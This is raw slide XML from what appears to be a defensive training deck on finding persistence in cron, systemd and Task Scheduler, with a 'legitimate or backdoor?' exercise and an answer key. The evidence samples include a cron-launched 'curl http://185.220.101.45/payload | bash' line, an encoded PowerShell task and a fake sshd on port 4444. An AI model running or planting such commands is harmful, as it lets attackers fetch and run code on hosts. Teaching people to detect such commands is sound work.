          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877824" y="327126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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="3463290"/>
            <a:ext cx="8154162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crontab -l -u jsmith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check one user's crontab specifically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crontab -e -u jsmith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edit it, remove the unauthorized line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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="442341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2026, section 7, systemd &amp; cron.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8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8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CLEANING UP CRON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SCHEDULED ACTIONS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Cleaning up Task Scheduler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same idea, a different console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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="150876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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640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search-white.png" id="407" name="Google Shape;4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709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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="219456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List everything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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2468880"/>
            <a:ext cx="229743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schtasks /query /fo LIST /v shows every task, including the ones hidden from the default GUI view.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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216402" y="150876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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3422142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alert-white.png" id="412" name="Google Shape;41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0211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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3422142" y="219456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Check the action, not just the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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3422142" y="2468880"/>
            <a:ext cx="229743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task named UpdateCheck that runs powershell.exe with an encoded argument is the whole point of checking.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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="150876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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295644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shield-white.png" id="417" name="Google Shape;41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3713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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295644" y="219456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Disable, then delete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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295644" y="2468880"/>
            <a:ext cx="229743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schtasks /change /tn name /disable first. Confirm nothing breaks before /delete.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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="3335518"/>
            <a:ext cx="8455800" cy="960000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 4286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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="347700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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="347700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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877824" y="347700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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="3669030"/>
            <a:ext cx="815416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schtasks /change /tn "UpdateCheck" /disable</a:t>
            </a:r>
            <a:b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schtasks /delete /tn "UpdateCheck" /f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9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9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CLEANING UP TASK SCHEDULER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APPLYING IT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Reading real evidence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Six real examples, pulled from live hosts. Read the evidence before you look at the verdict.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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="205740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search-dark.png" id="438" name="Google Shape;4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69" y="2155469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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2537460"/>
            <a:ext cx="2708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Read first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30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2811780"/>
            <a:ext cx="270891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cwd, cmdline, exe, environ, or the trigger and action for a scheduled task.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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216402" y="205740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users-dark.png" id="442" name="Google Shape;44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471" y="21554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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216402" y="2537460"/>
            <a:ext cx="2708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Decide as a group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30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216402" y="2811780"/>
            <a:ext cx="270891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Legitimate, or backdoor? Check the answer key at the end.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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="205740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check-dark.png" id="446" name="Google Shape;446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87973" y="21554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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2537460"/>
            <a:ext cx="2708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Then compare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30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2811780"/>
            <a:ext cx="270891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Every verdict comes with the reasoning, right or wrong.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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="3497580"/>
            <a:ext cx="8092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Not every example here is a backdoor. Guessing backdoor every time is not the skill.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READING REAL EVIDENCE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3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EXAMPLE 1 OF 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AdobeUpdateCheck, scheduled task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4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Legitimate, or backdoor?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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="1474470"/>
            <a:ext cx="8455914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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="147447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Trigger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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="147447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Daily at 3:00 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34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="1885950"/>
            <a:ext cx="8455914" cy="41148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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="188595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Action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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="188595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powershell.exe -enc JABjAGwAaQBlAG4A...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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2297430"/>
            <a:ext cx="8455914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34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="229743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Run as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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="229743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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2708910"/>
            <a:ext cx="8455914" cy="41148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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="270891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Last result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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="270891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Succeeded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4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34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EXAMPLE 4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EXAMPLE 2 OF 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3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.systemd-helper, PID 7723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31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Legitimate, or backdoor?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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="147447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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="147447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/tmp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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="188595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cmdline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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="188595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/tmp/.systemd-helper --daemon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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="229743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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="229743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/tmp/.systemd-helper (deleted)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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="270891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environ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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="270891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USER=www-data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1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1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EXAMPLE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EXAMPLE 3 OF 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kworker/0:2, PID 55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5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Legitimate, or backdoor?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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="147447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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="147447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(none, kernel thread)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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="188595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cmdline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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="188595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(empty, kernel thread)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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="229743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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="229743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(none, kernel thread)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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="270891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environ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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="270891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(none, kernel thread)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5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5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EXAMPLE 5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3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EXAMPLE 4 OF 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3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sshd, PID 9284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3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Legitimate, or backdoor?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33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="147447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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="147447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/home/jsmith/.local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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="188595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cmdline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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="188595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/home/jsmith/.local/sshd -p 4444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33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="229743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33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="229743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/home/jsmith/.local/sshd (deleted)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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="270891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environ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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="270891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USER=root  HOME=/home/jsmith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3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3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EXAMPLE 3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EXAMPLE 5 OF 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3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nginx, PID 1102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32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Legitimate, or backdoor?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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="1474470"/>
            <a:ext cx="8455914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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="147447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32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="147447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/var/www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32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="1885950"/>
            <a:ext cx="8455914" cy="41148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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="188595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cmdline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32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="188595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nginx: worker process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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2297430"/>
            <a:ext cx="8455914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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="229743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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="229743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/usr/sbin/nginx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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2708910"/>
            <a:ext cx="8455914" cy="41148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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="270891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environ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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="270891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(standard)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32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2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3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EXAMPLE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EXAMPLE 6 OF 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3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bash, PID 15550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Legitimate, or backdoor?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36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="1474470"/>
            <a:ext cx="8455914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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="147447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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="147447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/var/tmp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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="1885950"/>
            <a:ext cx="8455914" cy="41148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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="188595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cmdline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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="188595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bash -c "curl http://185.220.101.45/payload | bash"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36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2297430"/>
            <a:ext cx="8455914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36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="229743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36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="229743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/bin/bash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36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2708910"/>
            <a:ext cx="8455914" cy="41148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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2708910"/>
            <a:ext cx="15773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environ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36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091690" y="2708910"/>
            <a:ext cx="653567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USER=root  (launched by cron)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36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36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3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EXAMPLE 6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ANSWER KEY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six examples, revealed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342900" y="1440180"/>
            <a:ext cx="809244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b="1" i="0" lang="en" sz="13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ANSWER KEY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4" name="Table 123"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="342900" y="1350000"/>
          <a:ext cx="8458200" cy="3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00"/>
                <a:gridCol w="2200000"/>
                <a:gridCol w="1300000"/>
                <a:gridCol w="4558200"/>
              </a:tblGrid>
              <a:tr h="485714"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FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                        </a:rPr>
                        <a:t>#</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68575" marR="68575" marT="45720" marB="45720" anchor="ctr"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FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                        </a:rPr>
                        <a:t>Example</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68575" marR="68575" marT="45720" marB="45720" anchor="ctr"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FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                        </a:rPr>
                        <a:t>Verdict</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68575" marR="68575" marT="45720" marB="45720" anchor="ctr"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FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria"/>
                        </a:rPr>
                        <a:t>Why</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68575" marR="68575" marT="45720" marB="45720" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="660000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="48571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AdobeUpdateCheck, scheduled task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660000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>BACKDOOR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Adobe doesn't schedule encoded PowerShell to run as SYSTEM at 3 AM.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</a:tr>
              <a:tr h="48571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.systemd-helper, PID 7723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660000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>BACKDOOR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Dot-prefixed name, running from /tmp, deleted from disk after launch.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</a:tr>
              <a:tr h="48571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kworker/0:2, PID 55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C7268"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>LEGITIMATE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A real kernel worker thread. Empty /proc entries are normal here.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</a:tr>
              <a:tr h="48571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sshd, PID 9284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660000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>BACKDOOR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Real sshd never lives in a home directory. Listening on 4444, deleted from disk.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</a:tr>
              <a:tr h="48571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nginx, PID 1102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C7268"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>LEGITIMATE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Standard path, standard working directory, expected worker command line.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</a:tr>
              <a:tr h="485716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bash, PID 15550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660000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>BACKDOOR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B1E1D"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Downloads a file from a raw IP and pipes it straight into bash.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68575" marR="68575" marT="45720" marB="45720" anchor="ctr"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TONIGHT'S PRACTICE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exercises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7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Three passes over a Range host: find, disable, and clean up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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="157734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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="185166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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="185166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37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="176936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Hunt for a backdoor process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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="207111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Run ps -aux on a Range host, pick anything suspicious, and pull its /proc details.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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="260604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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="288036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37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="288036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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="279806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Audit systemd units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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="309981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List every service, check /etc/systemd/system/ for anything unfamiliar.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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="363474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37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="390906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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="390906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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="382676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Clean up cron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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="412851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Check all three cron locations for entries nobody on the team put there.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3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TONIGHT'S EXERCISES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3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3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Hunt for a backdoor process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38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Find it, then build the case against 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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="140589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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="140589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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="1385316"/>
            <a:ext cx="29489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Pull the full process list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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840480" y="1385316"/>
            <a:ext cx="425196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ps -aux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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="183108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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="183108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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="1810512"/>
            <a:ext cx="29489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Pick your top suspect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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840480" y="1810512"/>
            <a:ext cx="425196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Odd name, odd path, or odd owner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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="225628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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="225628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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="2235708"/>
            <a:ext cx="29489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Pull its working directory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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840480" y="2235708"/>
            <a:ext cx="425196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ls -la /proc/PID/cwd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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="268147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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="268147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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="2660904"/>
            <a:ext cx="29489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Pull its exact command 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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840480" y="2660904"/>
            <a:ext cx="425196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cat /proc/PID/cmdline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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="310667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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="310667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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="3086100"/>
            <a:ext cx="29489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Pull its real executable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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840480" y="3086100"/>
            <a:ext cx="425196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readlink /proc/PID/exe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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="370332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Write down what you found before deciding. A guess without evidence is not an audit.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38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8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3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3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Audit systemd units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3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Everything registered, not just everything running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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900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List every service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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2263140"/>
            <a:ext cx="19888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systemctl list-units --type=service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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455164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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455164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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455164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List every unit file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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455164" y="2263140"/>
            <a:ext cx="19888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systemctl list-unit-files, running or not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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567428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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567428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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567428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Check the unit directory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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567428" y="2263140"/>
            <a:ext cx="19888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ls -la /etc/systemd/system/, sorted by date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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6679692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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6679692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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6679692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Read anything unfamiliar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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
